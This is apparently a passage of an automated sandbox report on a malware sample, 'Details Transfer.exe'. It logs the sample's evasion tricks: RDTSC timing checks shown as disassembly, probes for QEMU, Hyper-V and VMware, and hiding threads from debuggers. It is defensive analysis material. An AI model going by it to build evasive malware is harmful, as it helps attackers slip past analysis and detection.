      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 0000000004F43030 second address: 0000000004F43030 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FC0509987F8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f jmp 00007FC0509987FEh 0x00000021 test dh, bh 0x00000023 pop ecx 0x00000024 cmp bx, cx 0x00000027 add edi, edx 0x00000029 dec ecx 0x0000002a cmp ecx, 00000000h 0x0000002d jne 00007FC0509987C8h 0x0000002f cmp dx, ax 0x00000032 test dl, cl 0x00000034 push ecx 0x00000035 cmp cx, dx 0x00000038 call 00007FC05099881Fh 0x0000003d call 00007FC05099880Ah 0x00000042 lfence 0x00000045 mov edx, dword ptr [7FFE0014h] 0x0000004b lfence 0x0000004e ret 0x0000004f mov esi, edx 0x00000051 pushad 0x00000052 rdtsc
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\Details Transfer.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\Details Transfer.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\Details Transfer.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\Details Transfer.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: Details Transfer.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 0000000004F42C84 second address: 0000000004F42CA9 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+14h], ecx 0x00000006 mov ecx, dword ptr [eax+24h] 0x00000009 cmp bx, bx 0x0000000c mov dword ptr [ebp+10h], ecx 0x0000000f mov esi, dword ptr [eax+20h] 0x00000012 test edx, eax 0x00000014 add esi, dword ptr [ebp+04h] 0x00000017 xor ecx, ecx 0x00000019 test dl, cl 0x0000001b test cl, bl 0x0000001d mov edx, dword ptr [esi] 0x0000001f pushad 0x00000020 mov esi, 000000ECh 0x00000025 rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 0000000004F43030 second address: 0000000004F43030 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FC0509987F8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f jmp 00007FC0509987FEh 0x00000021 test dh, bh 0x00000023 pop ecx 0x00000024 cmp bx, cx 0x00000027 add edi, edx 0x00000029 dec ecx 0x0000002a cmp ecx, 00000000h 0x0000002d jne 00007FC0509987C8h 0x0000002f cmp dx, ax 0x00000032 test dl, cl 0x00000034 push ecx 0x00000035 cmp cx, dx 0x00000038 call 00007FC05099881Fh 0x0000003d call 00007FC05099880Ah 0x00000042 lfence 0x00000045 mov edx, dword ptr [7FFE0014h] 0x0000004b lfence 0x0000004e ret 0x0000004f mov esi, edx 0x00000051 pushad 0x00000052 rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 0000000004F43054 second address: 0000000004F43054 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FC050396BF1h 0x0000001f popad 0x00000020 call 00007FC0503969ACh 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 0000000004F403DE second address: 0000000004F40428 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 add edi, 00010000h 0x00000009 push edi 0x0000000a cmp ebx, eax 0x0000000c add edi, 04h 0x0000000f push edi 0x00000010 add edi, 04h 0x00000013 jmp 00007FC050998802h 0x00000015 cld 0x00000016 push edi 0x00000017 test dh, bh 0x00000019 push 0003E800h 0x0000001e add edi, 04h 0x00000021 test edi, B6A16B30h 0x00000027 push edi 0x00000028 cmp ah, dh 0x0000002a push 00000003h 0x0000002c push 00000030h 0x0000002e push dword ptr [ebp+0000009Ch] 0x00000034 pushad 0x00000035 mov ebx, 0000002Fh 0x0000003a rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 0000000004F40428 second address: 0000000004F42E7E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push eax 0x00000004 call 00007FC05039A058h 0x00000009 call 00007FC050396925h 0x0000000e pop ebx 0x0000000f sub ebx, 05h 0x00000012 jmp 00007FC050396936h 0x00000014 cmp dx, ax 0x00000017 inc ebx 0x00000018 jmp 00007FC050396932h 0x0000001a test edx, ecx 0x0000001c dec ebx 0x0000001d xor edx, edx 0x0000001f mov eax, ebx 0x00000021 mov ecx, 00000004h 0x00000026 div ecx 0x00000028 cmp edx, 00000000h 0x0000002b jne 00007FC0503968FDh 0x0000002d movd mm3, ebx 0x00000030 jmp 00007FC050396932h 0x00000032 test ah, dh 0x00000034 pop eax 0x00000035 movd mm1, eax 0x00000038 jmp 00007FC05039692Eh 0x0000003a test bx, ax 0x0000003d call 00007FC050395E57h 0x00000042 cmp dx, ax 0x00000045 pushad 0x00000046 test dl, cl 0x00000048 push F21FD920h 0x0000004d cmp cx, dx 0x00000050 call 00007FC05039667Bh 0x00000055 pushad 0x00000056 mov esi, 000000A8h 0x0000005b rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 0000000004F40539 second address: 0000000004F42E7E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push 00000000h 0x00000005 push 00000004h 0x00000007 cmp ebx, eax 0x00000009 mov edx, ebp 0x0000000b add edx, 0000009Ch 0x00000011 push edx 0x00000012 test ecx, edx 0x00000014 test ah, FFFFFF82h 0x00000017 push 00000007h 0x00000019 test bx, ax 0x0000001c clc 0x0000001d push FFFFFFFFh 0x0000001f push eax 0x00000020 cmp bl, FFFFFFCEh 0x00000023 call 00007FC05099BDF8h 0x00000028 call 00007FC0509987F5h 0x0000002d pop ebx 0x0000002e sub ebx, 05h 0x00000031 jmp 00007FC050998806h 0x00000033 cmp dx, ax 0x00000036 inc ebx 0x00000037 jmp 00007FC050998802h 0x00000039 test edx, ecx 0x0000003b dec ebx 0x0000003c xor edx, edx 0x0000003e mov eax, ebx 0x00000040 mov ecx, 00000004h 0x00000045 div ecx 0x00000047 cmp edx, 00000000h 0x0000004a jne 00007FC0509987CDh 0x0000004c movd mm3, ebx 0x0000004f jmp 00007FC050998802h 0x00000051 test ah, dh 0x00000053 pop eax 0x00000054 movd mm1, eax 0x00000057 jmp 00007FC0509987FEh 0x00000059 test bx, ax 0x0000005c call 00007FC050997D27h 0x00000061 cmp dx, ax 0x00000064 pushad 0x00000065 test dl, cl 0x00000067 push F21FD920h 0x0000006c cmp cx, dx 0x0000006f call 00007FC05099854Bh 0x00000074 pushad 0x00000075 mov esi, 000000A8h 0x0000007a rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 0000000000562C84 second address: 0000000000562CA9 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+14h], ecx 0x00000006 mov ecx, dword ptr [eax+24h] 0x00000009 cmp bx, bx 0x0000000c mov dword ptr [ebp+10h], ecx 0x0000000f mov esi, dword ptr [eax+20h] 0x00000012 test edx, eax 0x00000014 add esi, dword ptr [ebp+04h] 0x00000017 xor ecx, ecx 0x00000019 test dl, cl 0x0000001b test cl, bl 0x0000001d mov edx, dword ptr [esi] 0x0000001f pushad 0x00000020 mov esi, 000000ECh 0x00000025 rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 0000000000563054 second address: 0000000000563054 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FC050998AC1h 0x0000001f popad 0x00000020 call 00007FC05099887Ch 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 00000000005603DE second address: 0000000000560428 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 add edi, 00010000h 0x00000009 push edi 0x0000000a cmp ebx, eax 0x0000000c add edi, 04h 0x0000000f push edi 0x00000010 add edi, 04h 0x00000013 jmp 00007FC050396932h 0x00000015 cld 0x00000016 push edi 0x00000017 test dh, bh 0x00000019 push 0003E800h 0x0000001e add edi, 04h 0x00000021 test edi, B6A16B30h 0x00000027 push edi 0x00000028 cmp ah, dh 0x0000002a push 00000003h 0x0000002c push 00000030h 0x0000002e push dword ptr [ebp+0000009Ch] 0x00000034 pushad 0x00000035 mov ebx, 0000002Fh 0x0000003a rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 0000000000560428 second address: 0000000000562E7E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push eax 0x00000004 call 00007FC05099BF28h 0x00000009 call 00007FC0509987F5h 0x0000000e pop ebx 0x0000000f sub ebx, 05h 0x00000012 jmp 00007FC050998806h 0x00000014 cmp dx, ax 0x00000017 inc ebx 0x00000018 jmp 00007FC050998802h 0x0000001a test edx, ecx 0x0000001c dec ebx 0x0000001d xor edx, edx 0x0000001f mov eax, ebx 0x00000021 mov ecx, 00000004h 0x00000026 div ecx 0x00000028 cmp edx, 00000000h 0x0000002b jne 00007FC0509987CDh 0x0000002d movd mm3, ebx 0x00000030 jmp 00007FC050998802h 0x00000032 test ah, dh 0x00000034 pop eax 0x00000035 movd mm1, eax 0x00000038 jmp 00007FC0509987FEh 0x0000003a test bx, ax 0x0000003d call 00007FC050997D27h 0x00000042 cmp dx, ax 0x00000045 pushad 0x00000046 test dl, cl 0x00000048 push F21FD920h 0x0000004d cmp cx, dx 0x00000050 call 00007FC05099854Bh 0x00000055 pushad 0x00000056 mov esi, 000000A8h 0x0000005b rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 0000000000560539 second address: 0000000000562E7E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push 00000000h 0x00000005 push 00000004h 0x00000007 cmp ebx, eax 0x00000009 mov edx, ebp 0x0000000b add edx, 0000009Ch 0x00000011 push edx 0x00000012 test ecx, edx 0x00000014 test ah, FFFFFF82h 0x00000017 push 00000007h 0x00000019 test bx, ax 0x0000001c clc 0x0000001d push FFFFFFFFh 0x0000001f push eax 0x00000020 cmp bl, FFFFFFCEh 0x00000023 call 00007FC050399F28h 0x00000028 call 00007FC050396925h 0x0000002d pop ebx 0x0000002e sub ebx, 05h 0x00000031 jmp 00007FC050396936h 0x00000033 cmp dx, ax 0x00000036 inc ebx 0x00000037 jmp 00007FC050396932h 0x00000039 test edx, ecx 0x0000003b dec ebx 0x0000003c xor edx, edx 0x0000003e mov eax, ebx 0x00000040 mov ecx, 00000004h 0x00000045 div ecx 0x00000047 cmp edx, 00000000h 0x0000004a jne 00007FC0503968FDh 0x0000004c movd mm3, ebx 0x0000004f jmp 00007FC050396932h 0x00000051 test ah, dh 0x00000053 pop eax 0x00000054 movd mm1, eax 0x00000057 jmp 00007FC05039692Eh 0x00000059 test bx, ax 0x0000005c call 00007FC050395E57h 0x00000061 cmp dx, ax 0x00000064 pushad 0x00000065 test dl, cl 0x00000067 push F21FD920h 0x0000006c cmp cx, dx 0x0000006f call 00007FC05039667Bh 0x00000074 pushad 0x00000075 mov esi, 000000A8h 0x0000007a rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 0000000000AF98E4 second address: 0000000000AF98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 0000000000AF9B4E second address: 0000000000AF9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F40208 rdtsc 0_2_04F40208
      Source: C:\Windows\explorer.exe TID: 5820Thread sleep time: -52000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exe TID: 6472Thread sleep time: -50000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: explorer.exe, 00000005.00000000.272076197.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: Details Transfer.exe, 00000000.00000002.231977585.0000000004F9A000.00000004.00000001.sdmp, Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: explorer.exe, 00000005.00000000.270223713.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: Details Transfer.exe, 00000002.00000002.301740842.0000000000957000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW|
      Source: Details Transfer.exe, 00000000.00000002.231977585.0000000004F9A000.00000004.00000001.sdmp, Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: Details Transfer.exe, 00000000.00000002.231977585.0000000004F9A000.00000004.00000001.sdmp, Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: Details Transfer.exe, 00000002.00000003.250465501.00000000009B5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000005.00000000.272076197.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: explorer.exe, 00000005.00000002.482640936.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
      Source: Details Transfer.exe, 00000002.00000003.250465501.00000000009B5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW,
      Source: Details Transfer.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000005.00000000.270223713.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: Details Transfer.exe, 00000000.00000002.231977585.0000000004F9A000.00000004.00000001.sdmp, Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: explorer.exe, 00000005.00000002.482708412.00000000056A1000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: Details Transfer.exe, 00000000.00000002.231977585.0000000004F9A000.00000004.00000001.sdmp, Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: explorer.exe, 00000005.00000000.272076197.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
      Source: explorer.exe, 00000005.00000000.271690851.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
      Source: Details Transfer.exe, 00000000.00000002.231977585.0000000004F9A000.00000004.00000001.sdmp, Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmpBinary or memory string: vmicvss
      Source: explorer.exe, 00000005.00000002.482610300.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
      Source: explorer.exe, 00000005.00000000.272076197.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
      Source: explorer.exe, 00000005.00000000.272254939.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
      Source: explorer.exe, 00000005.00000000.270223713.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: Details Transfer.exe, 00000000.00000002.231977585.0000000004F9A000.00000004.00000001.sdmp, Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: Details Transfer.exe, 00000000.00000002.231977585.0000000004F9A000.00000004.00000001.sdmp, Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
      Source: explorer.exe, 00000005.00000000.270223713.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\Details Transfer.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F40208 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,04F402A1,00000000,00000000,000000000_2_04F40208
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\Details Transfer.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\Details Transfer.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\Details Transfer.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\Details Transfer.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Details Transfer.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Details Transfer.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F40208 rdtsc 0_2_04F40208
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B967A LdrInitializeThunk,2_2_1E3B967A
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F433D0 mov eax, dword ptr fs:[00000030h]0_2_04F433D0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F419C1 mov eax, dword ptr fs:[00000030h]0_2_04F419C1
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F40D16 mov eax, dword ptr fs:[00000030h]0_2_04F40D16
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F42E78 mov eax, dword ptr fs:[00000030h]0_2_04F42E78
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F4120F mov eax, dword ptr fs:[00000030h]0_2_04F4120F
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F42B76 mov eax, dword ptr fs:[00000030h]0_2_04F42B76
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E43AE44 mov eax, dword ptr fs:[00000030h]2_2_1E43AE44
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E43AE44 mov eax, dword ptr fs:[00000030h]2_2_1E43AE44
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E37E620 mov eax, dword ptr fs:[00000030h]2_2_1E37E620
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3AA61C mov eax, dword ptr fs:[00000030h]2_2_1E3AA61C
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3AA61C mov eax, dword ptr fs:[00000030h]2_2_1E3AA61C
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E37C600 mov eax, dword ptr fs:[00000030h]2_2_1E37C600
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E37C600 mov eax, dword ptr fs:[00000030h]2_2_1E37C600
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E37C600 mov eax, dword ptr fs:[00000030h]2_2_1E37C600
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3A8E00 mov eax, dword ptr fs:[00000030h]2_2_1E3A8E00
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E39AE73 mov eax, dword ptr fs:[00000030h]2_2_1E39AE73
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E39AE73 mov eax, dword ptr fs:[00000030h]2_2_1E39AE73
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E39AE73 mov eax, dword ptr fs:[00000030h]2_2_1E39AE73
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E39AE73 mov eax, dword ptr fs:[00000030h]2_2_1E39AE73
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E39AE73 mov eax, dword ptr fs:[00000030h]2_2_1E39AE73
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E431608 mov eax, dword ptr fs:[00000030h]2_2_1E431608
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E38766D mov eax, dword ptr fs:[00000030h]2_2_1E38766D
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E387E41 mov eax, dword ptr fs:[00000030h]2_2_1E387E41
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E387E41 mov eax, dword ptr fs:[00000030h]2_2_1E387E41
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E387E41 mov eax, dword ptr fs:[00000030h]2_2_1E387E41
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E387E41 mov eax, dword ptr fs:[00000030h]2_2_1E387E41
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E387E41 mov eax, dword ptr fs:[00000030h]2_2_1E387E41
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E387E41 mov eax, dword ptr fs:[00000030h]2_2_1E387E41
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E42FE3F mov eax, dword ptr fs:[00000030h]2_2_1E42FE3F
      Source: C:\Users\user\Desktop\Details